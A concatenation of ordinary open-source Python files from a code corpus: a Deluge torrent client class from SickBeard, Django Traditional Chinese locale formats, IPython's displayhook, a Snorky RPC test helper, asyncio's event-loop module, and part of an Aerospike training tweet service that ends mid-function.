'params': [self.password],
'id': 1})
try:
self.auth = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
post_data = json.dumps({'method': 'web.connected',
'params': [],
'id': 10})
connected = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if not connected:
post_data = json.dumps({'method': 'web.get_hosts',
'params': [],
'id': 11})
hosts = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if len(hosts) == 0:
logger.log(self.name + u': WebUI does not contain daemons',
logger.ERROR)
return None
post_data = json.dumps({'method': 'web.connect',
'params': [hosts[0][0]],
'id': 11})
self.session.post(self.url, data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT)
post_data = json.dumps({'method': 'web.connected',
'params': [],
'id': 10})
connected = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if not connected:
logger.log(self.name + u': WebUI could not connect to daemon',
logger.ERROR)
return None
except RequestException:
return None
return self.auth
def _add_torrent_uri(self, result):
post_data = json.dumps({
'method': 'core.add_torrent_magnet',
'params': [result.url, {
'move_completed': 'true',
'move_completed_path': sickbeard.TV_DOWNLOAD_DIR
}],
'id': 2
})
result.hash = self._request(method='post',
data=post_data).json()['result']
return result.hash
def _add_torrent_file(self, result):
post_data = json.dumps({'method':
'core.add_torrent_file',
'params': [result.name + '.torrent',
b64encode(result.content),
{'move_completed': 'true',
'move_completed_path':
sickbeard.TV_DOWNLOAD_DIR}],
'id': 2})
result.hash = self._request(method='post',
data=post_data).json()['result']
return result.hash
def _set_torrent_label(self, result):
label = sickbeard.TORRENT_LABEL
if ' ' in label:
logger.log(self.name +
u': Invalid label. Label must not contain a space',
logger.ERROR)
return False
if label:
# check if label already exists and create it if not
post_data = json.dumps({
'method': 'label.get_labels',
'params': [],
'id': 3
})
labels = self._request(method='post',
data=post_data).json()['result']
if labels is not None:
if label not in labels:
logger.log(self.name + ': ' + label +
u' label does not exist in ' +
u'Deluge we must add it',
logger.DEBUG)
post_data = json.dumps({
'method': 'label.add',
'params': [label],
'id': 4
})
self._request(method='post', data=post_data)
logger.log(self.name + ': ' + label +
u' label added to Deluge', logger.DEBUG)
# add label to torrent
post_data = json.dumps({
'method': 'label.set_torrent',
'params': [result.hash, label],
'id': 5
})
self._request(method='post', data=post_data)
logger.log(self.name + ': ' + label +
u' label added to torrent',
logger.DEBUG)
else:
logger.log(self.name + ': ' +
u'label plugin not detected',
logger.DEBUG)
return False
return True
def _set_torrent_ratio(self, result):
ratio = None
if result.ratio:
ratio = result.ratio
if ratio:
post_data = json.dumps({'method': 'core.set_torrent_stop_at_ratio',
'params': [result.hash, True],
'id': 5})
self._request(method='post', data=post_data)
post_data = json.dumps({'method': 'core.set_torrent_stop_ratio',
'params': [result.hash, float(ratio)],
'id': 6})
self._request(method='post', data=post_data)
return True
def _set_torrent_path(self, result):
if sickbeard.TORRENT_PATH:
post_data = json.dumps({
'method': 'core.set_torrent_move_completed',
'params': [result.hash, True],
'id': 7
})
self._request(method='post', data=post_data)
post_data = json.dumps({
'method': 'core.set_torrent_move_completed_path',
'params': [result.hash, sickbeard.TORRENT_PATH],
'id': 8
})
self._request(method='post', data=post_data)
return True
def _set_torrent_pause(self, result):
if sickbeard.TORRENT_PAUSED:
post_data = json.dumps({'method': 'core.pause_torrent',
'params': [[result.hash]],
'id': 9})
self._request(method='post', data=post_data)
return True
api = DelugeAPI()
| gpl-3.0 |
helenst/django | django/conf/locale/zh_Hant/formats.py | 634 | 1810 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'Y年n月j日' # 2016年9月5日
TIME_FORMAT = 'H:i' # 20:45
DATETIME_FORMAT = 'Y年n月j日 H:i' # 2016年9月5日 20:45
YEAR_MONTH_FORMAT = 'Y年n月' # 2016年9月
MONTH_DAY_FORMAT = 'm月j日' # 9月5日
SHORT_DATE_FORMAT = 'Y年n月j日' # 2016年9月5日
SHORT_DATETIME_FORMAT = 'Y年n月j日 H:i' # 2016年9月5日 20:45
FIRST_DAY_OF_WEEK = 1 # 星期一 (Monday)
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%Y/%m/%d', # '2016/09/05'
'%Y-%m-%d', # '2016-09-05'
'%Y年%n月%j日', # '2016年9月5日'
)
TIME_INPUT_FORMATS = (
'%H:%M', # '20:45'
'%H:%M:%S', # '20:45:29'
'%H:%M:%S.%f', # '20:45:29.000200'
)
DATETIME_INPUT_FORMATS = (
'%Y/%m/%d %H:%M', # '2016/09/05 20:45'
'%Y-%m-%d %H:%M', # '2016-09-05 20:45'
'%Y年%n月%j日 %H:%M', # '2016年9月5日 14:45'
'%Y/%m/%d %H:%M:%S', # '2016/09/05 20:45:29'
'%Y-%m-%d %H:%M:%S', # '2016-09-05 20:45:29'
'%Y年%n月%j日 %H:%M:%S', # '2016年9月5日 20:45:29'
'%Y/%m/%d %H:%M:%S.%f', # '2016/09/05 20:45:29.000200'
'%Y-%m-%d %H:%M:%S.%f', # '2016-09-05 20:45:29.000200'
'%Y年%n月%j日 %H:%n:%S.%f', # '2016年9月5日 20:45:29.000200'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ''
NUMBER_GROUPING = 4
| bsd-3-clause |
omni5cience/django-inlineformfield | .tox/py27/lib/python2.7/site-packages/IPython/core/displayhook.py | 8 | 11365 | # -*- coding: utf-8 -*-
"""Displayhook for IPython.
This defines a callable class that IPython uses for `sys.displayhook`.
Authors:
* Fernando Perez
* Brian Granger
* Robert Kern
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
# Copyright (C) 2001-2007 Fernando Perez <[email protected]>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import sys
from IPython.core.formatters import _safe_get_formatter_method
from IPython.config.configurable import Configurable
from IPython.utils import io
from IPython.utils.py3compat import builtin_mod
from IPython.utils.traitlets import Instance
from IPython.utils.warn import warn
#-----------------------------------------------------------------------------
# Main displayhook class
#-----------------------------------------------------------------------------
# TODO: Move the various attributes (cache_size, [others now moved]). Some
# of these are also attributes of InteractiveShell. They should be on ONE object
# only and the other objects should ask that one object for their values.
class DisplayHook(Configurable):
"""The custom IPython displayhook to replace sys.displayhook.
This class does many things, but the basic idea is that it is a callable
that gets called anytime user code returns a value.
"""
shell = Instance('IPython.core.interactiveshell.InteractiveShellABC')
def __init__(self, shell=None, cache_size=1000, **kwargs):
super(DisplayHook, self).__init__(shell=shell, **kwargs)
cache_size_min = 3
if cache_size <= 0:
self.do_full_cache = 0
cache_size = 0
elif cache_size < cache_size_min:
self.do_full_cache = 0
cache_size = 0
warn('caching was disabled (min value for cache size is %s).' %
cache_size_min,level=3)
else:
self.do_full_cache = 1
self.cache_size = cache_size
# we need a reference to the user-level namespace
self.shell = shell
self._,self.__,self.___ = '','',''
# these are deliberately global:
to_user_ns = {'_':self._,'__':self.__,'___':self.___}
self.shell.user_ns.update(to_user_ns)
@property
def prompt_count(self):
return self.shell.execution_count
#-------------------------------------------------------------------------
# Methods used in __call__. Override these methods to modify the behavior
# of the displayhook.
#-------------------------------------------------------------------------
def check_for_underscore(self):
"""Check if the user has set the '_' variable by hand."""
# If something injected a '_' variable in __builtin__, delete
# ipython's automatic one so we don't clobber that. gettext() in
# particular uses _, so we need to stay away from it.
if '_' in builtin_mod.__dict__:
try:
del self.shell.user_ns['_']
except KeyError:
pass
def quiet(self):
"""Should we silence the display hook because of ';'?"""
# do not print output if input ends in ';'
try:
cell = self.shell.history_manager.input_hist_parsed[self.prompt_count]
return cell.rstrip().endswith(';')
except IndexError:
# some uses of ipshellembed may fail here
return False
def start_displayhook(self):
"""Start the displayhook, initializing resources."""
pass
def write_output_prompt(self):
"""Write the output prompt.
The default implementation simply writes the prompt to
``io.stdout``.
"""
# Use write, not print which adds an extra space.
io.stdout.write(self.shell.separate_out)
outprompt = self.shell.prompt_manager.render('out')
if self.do_full_cache:
io.stdout.write(outprompt)
def compute_format_data(self, result):
"""Compute format data of the object to be displayed.
The format data is a generalization of the :func:`repr` of an object.
In the default implementation the format data is a :class:`dict` of
key value pair where the keys are valid MIME types and the values
are JSON'able data structure containing the raw data for that MIME
type. It is up to frontends to determine pick a MIME to to use and
display that data in an appropriate manner.
This method only computes the format data for the object and should
NOT actually print or write that to a stream.
Parameters
----------
result : object
The Python object passed to the display hook, whose format will be
computed.
Returns
-------
(format_dict, md_dict) : dict
format_dict is a :class:`dict` whose keys are valid MIME types and values are
JSON'able raw data for that MIME type. It is recommended that
all return values of this should always include the "text/plain"
MIME type representation of the object.
md_dict is a :class:`dict` with the same MIME type keys
of metadata associated with each output.
"""
return self.shell.display_formatter.format(result)
def write_format_data(self, format_dict, md_dict=None):
"""Write the format data dict to the frontend.
This default version of this method simply writes the plain text
representation of the object to ``io.stdout``. Subclasses should
override this method to send the entire `format_dict` to the
frontends.
Parameters
----------
format_dict : dict
The format dict for the object passed to `sys.displayhook`.
md_dict : dict (optional)
The metadata dict to be associated with the display data.
"""
# We want to print because we want to always make sure we have a
# newline, even if all the prompt separators are ''. This is the
# standard IPython behavior.
result_repr = format_dict['text/plain']
if '\n' in result_repr:
# So that multi-line strings line up with the left column of
# the screen, instead of having the output prompt mess up
# their first line.
# We use the prompt template instead of the expanded prompt
# because the expansion may add ANSI escapes that will interfere
# with our ability to determine whether or not we should add
# a newline.
prompt_template = self.shell.prompt_manager.out_template
if prompt_template and not prompt_template.endswith('\n'):
# But avoid extraneous empty lines.
result_repr = '\n' + result_repr
print(result_repr, file=io.stdout)
def update_user_ns(self, result):
"""Update user_ns with various things like _, __, _1, etc."""
# Avoid recursive reference when displaying _oh/Out
if result is not self.shell.user_ns['_oh']:
if len(self.shell.user_ns['_oh']) >= self.cache_size and self.do_full_cache:
warn('Output cache limit (currently '+
repr(self.cache_size)+' entries) hit.\n'
'Flushing cache and resetting history counter...\n'
'The only history variables available will be _,__,___ and _1\n'
'with the current result.')
self.flush()
# Don't overwrite '_' and friends if '_' is in __builtin__ (otherwise
# we cause buggy behavior for things like gettext).
if '_' not in builtin_mod.__dict__:
self.___ = self.__
self.__ = self._
self._ = result
self.shell.push({'_':self._,
'__':self.__,
'___':self.___}, interactive=False)
# hackish access to top-level namespace to create _1,_2... dynamically
to_main = {}
if self.do_full_cache:
new_result = '_'+repr(self.prompt_count)
to_main[new_result] = result
self.shell.push(to_main, interactive=False)
self.shell.user_ns['_oh'][self.prompt_count] = result
def log_output(self, format_dict):
"""Log the output."""
if self.shell.logger.log_output:
self.shell.logger.log_write(format_dict['text/plain'], 'output')
self.shell.history_manager.output_hist_reprs[self.prompt_count] = \
format_dict['text/plain']
def finish_displayhook(self):
"""Finish up all displayhook activities."""
io.stdout.write(self.shell.separate_out2)
io.stdout.flush()
def __call__(self, result=None):
"""Printing with history cache management.
This is invoked everytime the interpreter needs to print, and is
activated by setting the variable sys.displayhook to it.
"""
self.check_for_underscore()
if result is not None and not self.quiet():
# If _ipython_display_ is defined, use that to display this object.
display_method = _safe_get_formatter_method(result, '_ipython_display_')
if display_method is not None:
try:
return display_method()
except NotImplementedError:
pass
self.start_displayhook()
self.write_output_prompt()
format_dict, md_dict = self.compute_format_data(result)
self.write_format_data(format_dict, md_dict)
self.update_user_ns(result)
self.log_output(format_dict)
self.finish_displayhook()
def flush(self):
if not self.do_full_cache:
raise ValueError("You shouldn't have reached the cache flush "
"if full caching is not enabled!")
# delete auto-generated vars from global namespace
for n in range(1,self.prompt_count + 1):
key = '_'+repr(n)
try:
del self.shell.user_ns[key]
except: pass
# In some embedded circumstances, the user_ns doesn't have the
# '_oh' key set up.
oh = self.shell.user_ns.get('_oh', None)
if oh is not None:
oh.clear()
# Release our own references to objects:
self._, self.__, self.___ = '', '', ''
if '_' not in builtin_mod.__dict__:
self.shell.user_ns.update({'_':None,'__':None, '___':None})
import gc
# TODO: Is this really needed?
# IronPython blocks here forever
if sys.platform != "cli":
gc.collect()
| mit |
ntrrgc/snorky | snorky/tests/utils/rpc.py | 1 | 2428 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from snorky.services.base import format_call
from snorky.hashable import make_hashable
class TestRequest(object):
"""Mocked Request class for use with RPC services"""
def __init__(self, service, client, command, params):
self.service = service
self.client = client
self.command = command
self.params = make_hashable(params)
self.debug = True # propagate internal errors
self.call_id = None
self.resolved = False
self.response = None
self.response_type = None
def reply(self, data):
if self.resolved:
raise RuntimeError("This request has already been resolved")
self.response_type = "response"
self.response = data
self.resolved = True
def error(self, msg):
if self.resolved:
raise RuntimeError("This request has already been resolved")
self.response_type = "error"
self.response = msg
self.resolved = True
def format_call(self):
return format_call(self.command, self.params)
class RPCTestMixin(object):
"""Useful methods for testing RPC services"""
def _rpcCallNoAsserts(self, service, client, command, request_debug=True,
**params):
# request_debug=True tells RPCService to propagate internal errors
# instead of replying with an RPC error.
request = TestRequest(service, client, command, params)
request.debug = request_debug
service.process_request(request)
return request
def rpcCall(self, service, client, command, **params):
request = self._rpcCallNoAsserts(service, client, command, **params)
self.assertTrue(request.resolved)
if request.response_type == "error":
raise AssertionError("Error in RPC call: %s" % request.response)
self.assertEqual(request.response_type, "response")
return request.response
def rpcExpectError(self, service, client, command, **params):
request = self._rpcCallNoAsserts(service, client, command, **params)
self.assertTrue(request.resolved)
self.assertEqual(request.response_type, "error")
return request.response
| mpl-2.0 |
mccheung/kbengine | kbe/src/lib/python/Lib/asyncio/events.py | 61 | 18822 | """Event loop and event loop policy."""
__all__ = ['AbstractEventLoopPolicy',
'AbstractEventLoop', 'AbstractServer',
'Handle', 'TimerHandle',
'get_event_loop_policy', 'set_event_loop_policy',
'get_event_loop', 'set_event_loop', 'new_event_loop',
'get_child_watcher', 'set_child_watcher',
]
import functools
import inspect
import reprlib
import socket
import subprocess
import sys
import threading
import traceback
_PY34 = sys.version_info >= (3, 4)
def _get_function_source(func):
if _PY34:
func = inspect.unwrap(func)
elif hasattr(func, '__wrapped__'):
func = func.__wrapped__
if inspect.isfunction(func):
code = func.__code__
return (code.co_filename, code.co_firstlineno)
if isinstance(func, functools.partial):
return _get_function_source(func.func)
if _PY34 and isinstance(func, functools.partialmethod):
return _get_function_source(func.func)
return None
def _format_args(args):
"""Format function arguments.
Special case for a single parameter: ('hello',) is formatted as ('hello').
"""
# use reprlib to limit the length of the output
args_repr = reprlib.repr(args)
if len(args) == 1 and args_repr.endswith(',)'):
args_repr = args_repr[:-2] + ')'
return args_repr
def _format_callback(func, args, suffix=''):
if isinstance(func, functools.partial):
if args is not None:
suffix = _format_args(args) + suffix
return _format_callback(func.func, func.args, suffix)
func_repr = getattr(func, '__qualname__', None)
if not func_repr:
func_repr = repr(func)
if args is not None:
func_repr += _format_args(args)
if suffix:
func_repr += suffix
source = _get_function_source(func)
if source:
func_repr += ' at %s:%s' % source
return func_repr
class Handle:
"""Object returned by callback registration methods."""
__slots__ = ('_callback', '_args', '_cancelled', '_loop',
'_source_traceback', '_repr', '__weakref__')
def __init__(self, callback, args, loop):
assert not isinstance(callback, Handle), 'A Handle is not a callback'
self._loop = loop
self._callback = callback
self._args = args
self._cancelled = False
self._repr = None
if self._loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
else:
self._source_traceback = None
def _repr_info(self):
info = [self.__class__.__name__]
if self._cancelled:
info.append('cancelled')
if self._callback is not None:
info.append(_format_callback(self._callback, self._args))
if self._source_traceback:
frame = self._source_traceback[-1]
info.append('created at %s:%s' % (frame[0], frame[1]))
return info
def __repr__(self):
if self._repr is not None:
return self._repr
info = self._repr_info()
return '<%s>' % ' '.join(info)
def cancel(self):
self._cancelled = True
if self._loop.get_debug():
# Keep a representation in debug mode to keep callback and
# parameters. For example, to log the warning "Executing <Handle
# ...> took 2.5 second"
self._repr = repr(self)
self._callback = None
self._args = None
def _run(self):
try:
self._callback(*self._args)
except Exception as exc:
cb = _format_callback(self._callback, self._args)
msg = 'Exception in callback {}'.format(cb)
context = {
'message': msg,
'exception': exc,
'handle': self,
}
if self._source_traceback:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
self = None # Needed to break cycles when an exception occurs.
class TimerHandle(Handle):
"""Object returned by timed callback registration methods."""
__slots__ = ['_when']
def __init__(self, when, callback, args, loop):
assert when is not None
super().__init__(callback, args, loop)
if self._source_traceback:
del self._source_traceback[-1]
self._when = when
def _repr_info(self):
info = super()._repr_info()
pos = 2 if self._cancelled else 1
info.insert(pos, 'when=%s' % self._when)
return info
def __hash__(self):
return hash(self._when)
def __lt__(self, other):
return self._when < other._when
def __le__(self, other):
if self._when < other._when:
return True
return self.__eq__(other)
def __gt__(self, other):
return self._when > other._when
def __ge__(self, other):
if self._when > other._when:
return True
return self.__eq__(other)
def __eq__(self, other):
if isinstance(other, TimerHandle):
return (self._when == other._when and
self._callback == other._callback and
self._args == other._args and
self._cancelled == other._cancelled)
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
return NotImplemented if equal is NotImplemented else not equal
class AbstractServer:
"""Abstract server returned by create_server()."""
def close(self):
"""Stop serving. This leaves existing connections open."""
return NotImplemented
def wait_closed(self):
"""Coroutine to wait until service is closed."""
return NotImplemented
class AbstractEventLoop:
"""Abstract event loop."""
# Running and stopping the event loop.
def run_forever(self):
"""Run the event loop until stop() is called."""
raise NotImplementedError
def run_until_complete(self, future):
"""Run the event loop until a Future is done.
Return the Future's result, or raise its exception.
"""
raise NotImplementedError
def stop(self):
"""Stop the event loop as soon as reasonable.
Exactly how soon that is may depend on the implementation, but
no more I/O callbacks should be scheduled.
"""
raise NotImplementedError
def is_running(self):
"""Return whether the event loop is currently running."""
raise NotImplementedError
def is_closed(self):
"""Returns True if the event loop was closed."""
raise NotImplementedError
def close(self):
"""Close the loop.
The loop should not be running.
This is idempotent and irreversible.
No other methods should be called after this one.
"""
raise NotImplementedError
# Methods scheduling callbacks. All these return Handles.
def call_soon(self, callback, *args):
return self.call_later(0, callback, *args)
def call_later(self, delay, callback, *args):
raise NotImplementedError
def call_at(self, when, callback, *args):
raise NotImplementedError
def time(self):
raise NotImplementedError
# Method scheduling a coroutine object: create a task.
def create_task(self, coro):
raise NotImplementedError
# Methods for interacting with threads.
def call_soon_threadsafe(self, callback, *args):
raise NotImplementedError
def run_in_executor(self, executor, callback, *args):
raise NotImplementedError
def set_default_executor(self, executor):
raise NotImplementedError
# Network I/O methods returning Futures.
def getaddrinfo(self, host, port, *, family=0, type=0, proto=0, flags=0):
raise NotImplementedError
def getnameinfo(self, sockaddr, flags=0):
raise NotImplementedError
def create_connection(self, protocol_factory, host=None, port=None, *,
ssl=None, family=0, proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None):
raise NotImplementedError
def create_server(self, protocol_factory, host=None, port=None, *,
family=socket.AF_UNSPEC, flags=socket.AI_PASSIVE,
sock=None, backlog=100, ssl=None, reuse_address=None):
"""A coroutine which creates a TCP server bound to host and port.
The return value is a Server object which can be used to stop
the service.
If host is an empty string or None all interfaces are assumed
and a list of multiple sockets will be returned (most likely
one for IPv4 and another one for IPv6).
family can be set to either AF_INET or AF_INET6 to force the
socket to use IPv4 or IPv6. If not set it will be determined
from host (defaults to AF_UNSPEC).
flags is a bitmask for getaddrinfo().
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
reuse_address tells the kernel to reuse a local socket in
TIME_WAIT state, without waiting for its natural timeout to
expire. If not specified will automatically be set to True on
UNIX.
"""
raise NotImplementedError
def create_unix_connection(self, protocol_factory, path, *,
ssl=None, sock=None,
server_hostname=None):
raise NotImplementedError
def create_unix_server(self, protocol_factory, path, *,
sock=None, backlog=100, ssl=None):
"""A coroutine which creates a UNIX Domain Socket server.
The return value is a Server object, which can be used to stop
the service.
path is a str, representing a file systsem path to bind the
server socket to.
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
"""
raise NotImplementedError
def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0):
raise NotImplementedError
# Pipes and subprocesses.
def connect_read_pipe(self, protocol_factory, pipe):
"""Register read pipe in event loop. Set the pipe to non-blocking mode.
protocol_factory should instantiate object with Protocol interface.
pipe is a file-like object.
Return pair (transport, protocol), where transport supports the
ReadTransport interface."""
# The reason to accept file-like object instead of just file descriptor
# is: we need to own pipe and close it at transport finishing
# Can got complicated errors if pass f.fileno(),
# close fd in pipe transport then close f and vise versa.
raise NotImplementedError
def connect_write_pipe(self, protocol_factory, pipe):
"""Register write pipe in event loop.
protocol_factory should instantiate object with BaseProtocol interface.
Pipe is file-like object already switched to nonblocking.
Return pair (transport, protocol), where transport support
WriteTransport interface."""
# The reason to accept file-like object instead of just file descriptor
# is: we need to own pipe and close it at transport finishing
# Can got complicated errors if pass f.fileno(),
# close fd in pipe transport then close f and vise versa.
raise NotImplementedError
def subprocess_shell(self, protocol_factory, cmd, *, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
def subprocess_exec(self, protocol_factory, *args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
# Ready-based callback registration methods.
# The add_*() methods return None.
# The remove_*() methods return True if something was removed,
# False if there was nothing to delete.
def add_reader(self, fd, callback, *args):
raise NotImplementedError
def remove_reader(self, fd):
raise NotImplementedError
def add_writer(self, fd, callback, *args):
raise NotImplementedError
def remove_writer(self, fd):
raise NotImplementedError
# Completion based I/O methods returning Futures.
def sock_recv(self, sock, nbytes):
raise NotImplementedError
def sock_sendall(self, sock, data):
raise NotImplementedError
def sock_connect(self, sock, address):
raise NotImplementedError
def sock_accept(self, sock):
raise NotImplementedError
# Signal handling.
def add_signal_handler(self, sig, callback, *args):
raise NotImplementedError
def remove_signal_handler(self, sig):
raise NotImplementedError
# Error handlers.
def set_exception_handler(self, handler):
raise NotImplementedError
def default_exception_handler(self, context):
raise NotImplementedError
def call_exception_handler(self, context):
raise NotImplementedError
# Debug flag management.
def get_debug(self):
raise NotImplementedError
def set_debug(self, enabled):
raise NotImplementedError
class AbstractEventLoopPolicy:
"""Abstract policy for accessing the event loop."""
def get_event_loop(self):
"""Get the event loop for the current context.
Returns an event loop object implementing the BaseEventLoop interface,
or raises an exception in case no event loop has been set for the
current context and the current policy does not specify to create one.
It should never return None."""
raise NotImplementedError
def set_event_loop(self, loop):
"""Set the event loop for the current context to loop."""
raise NotImplementedError
def new_event_loop(self):
"""Create and return a new event loop object according to this
policy's rules. If there's need to set this loop as the event loop for
the current context, set_event_loop must be called explicitly."""
raise NotImplementedError
# Child processes handling (Unix only).
def get_child_watcher(self):
"Get the watcher for child processes."
raise NotImplementedError
def set_child_watcher(self, watcher):
"""Set the watcher for child processes."""
raise NotImplementedError
class BaseDefaultEventLoopPolicy(AbstractEventLoopPolicy):
"""Default policy implementation for accessing the event loop.
In this policy, each thread has its own event loop. However, we
only automatically create an event loop by default for the main
thread; other threads by default have no event loop.
Other policies may have different rules (e.g. a single global
event loop, or automatically creating an event loop per thread, or
using some other notion of context to which an event loop is
associated).
"""
_loop_factory = None
class _Local(threading.local):
_loop = None
_set_called = False
def __init__(self):
self._local = self._Local()
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
if (self._local._loop is None and
not self._local._set_called and
isinstance(threading.current_thread(), threading._MainThread)):
self.set_event_loop(self.new_event_loop())
assert self._local._loop is not None, \
('There is no current event loop in thread %r.' %
threading.current_thread().name)
return self._local._loop
def set_event_loop(self, loop):
"""Set the event loop."""
self._local._set_called = True
assert loop is None or isinstance(loop, AbstractEventLoop)
self._local._loop = loop
def new_event_loop(self):
"""Create a new event loop.
You must call set_event_loop() to make this the current event
loop.
"""
return self._loop_factory()
# Event loop policy. The policy itself is always global, even if the
# policy's rules say that there is an event loop per thread (or other
# notion of context). The default policy is installed by the first
# call to get_event_loop_policy().
_event_loop_policy = None
# Lock for protecting the on-the-fly creation of the event loop policy.
_lock = threading.Lock()
def _init_event_loop_policy():
global _event_loop_policy
with _lock:
if _event_loop_policy is None: # pragma: no branch
from . import DefaultEventLoopPolicy
_event_loop_policy = DefaultEventLoopPolicy()
def get_event_loop_policy():
"""Get the current event loop policy."""
if _event_loop_policy is None:
_init_event_loop_policy()
return _event_loop_policy
def set_event_loop_policy(policy):
"""Set the current event loop policy.
If policy is None, the default policy is restored."""
global _event_loop_policy
assert policy is None or isinstance(policy, AbstractEventLoopPolicy)
_event_loop_policy = policy
def get_event_loop():
"""Equivalent to calling get_event_loop_policy().get_event_loop()."""
return get_event_loop_policy().get_event_loop()
def set_event_loop(loop):
"""Equivalent to calling get_event_loop_policy().set_event_loop(loop)."""
get_event_loop_policy().set_event_loop(loop)
def new_event_loop():
"""Equivalent to calling get_event_loop_policy().new_event_loop()."""
return get_event_loop_policy().new_event_loop()
def get_child_watcher():
"""Equivalent to calling get_event_loop_policy().get_child_watcher()."""
return get_event_loop_policy().get_child_watcher()
def set_child_watcher(watcher):
"""Equivalent to calling
get_event_loop_policy().set_child_watcher(watcher)."""
return get_event_loop_policy().set_child_watcher(watcher)
| lgpl-3.0 |
skatsuta/aerospike-training | book/answers/Complete/Python/TweetService.py | 2 | 9958 | #!/usr/bin/env python
#
# * Copyright 2012-2014 by Aerospike.
# *
# * Permission is hereby granted, free of charge, to any person obtaining a copy
# * of this software and associated documentation files (the "Software"), to
# * deal in the Software without restriction, including without limitation the
# * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# * sell copies of the Software, and to permit persons to whom the Software is
# * furnished to do so, subject to the following conditions:
# *
# * The above copyright notice and this permission notice shall be included in
# * all copies or substantial portions of the Software.
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# * IN THE SOFTWARE.
#
from __future__ import print_function
import aerospike
import sys
import time
from aerospike import predicates as p
class TweetService(object):
def __init__(self, client):
self.client = client
def createTweet(self):
print("\n********** Create Tweet **********\n")
# /*********************///
# /*****Data Model*****///
# Namespace: test
# Set: tweets
# Key: <username:<counter>>
# Bins:
# tweet - string
# ts - int (Stores epoch timestamp of the tweet)
# username - string
# Sample Key: dash:1
# Sample Record:
# { tweet: 'Put. A. Bird. On. It.',
# ts: 1408574221,
# username: 'dash'
# }
# /*********************///
userRecord = None
userKey = None
tweetKey = None
# Get username
username = str()
username = raw_input("Enter username: ")
if len(username) > 0:
# Check if username exists
meta = None
policy = None
userKey = ("test", "users", username)
(key, metadata,userRecord) = self.client.get(userKey,policy)
record = {}
if userRecord:
# Set Tweet Count
if 'tweetcount' in userRecord:
nextTweetCount = int(userRecord['tweetcount']) + 1
else:
nextTweetCount = 1
# Get tweet
record['tweet'] = raw_input("Enter tweet for " + username + ":")
# Write record
#wPolicy.recordExistsAction = RecordExistsAction.UPDATE
# Create timestamp to store along with the tweet so we can
# query, index and report on it
ts= self.getTimeStamp()
tweetKey = ("test", "tweets", username + ":" + str(nextTweetCount))
record["ts"] = ts
record["username"]= username
self.client.put(tweetKey,record, meta, policy)
print("\nINFO: Tweet record created!\n",record,tweetKey)
# Update tweet count and last tweet'd timestamp in the user
# record
self.updateUser(self.client, userKey, policy, ts, nextTweetCount)
else:
print("ERROR: User record not found!\n")
def scanAllTweetsForAllUsers(self):
try:
# Python Scan
tweetScan = self.client.scan("test", "tweets")
tweetScan.select('tweet')
# callback for each record read
def tweetCallback((key, meta, record)):
print(record)
# invoke the operations, and for each record invoke the callback
tweetScan.foreach(tweetCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def updateUser(self, client, userKey, policy, ts, tweetCount):
userTweet = {}
userTweet["tweetcount"] = tweetCount
userTweet["lasttweeted"] = ts
meta = None
self.client.put(userKey,userTweet, meta, policy)
print("\nINFO: The tweet count now is: " , tweetCount)
def updateUserUsingOperate(self, client, userKey, policy, ts):
record = self.client.operate(policy, userKey, Operation.add(Bin("tweetcount", 1)), Operation.put(Bin("lasttweeted", ts)), Operation.get())
print("\nINFO: The tweet count now is: " + record.getValue("tweetcount"))
def queryTweetsByUsername(self):
print("\n********** Query Tweets By Username **********\n")
# Get username
username = str()
username = raw_input("Enter username: ")
if len(username) > 0:
try:
self.client.index_string_create(None, "test", "tweets", "username", "username_index")
time.sleep(5)
print("\nINFO: String Secondary Index Created ")
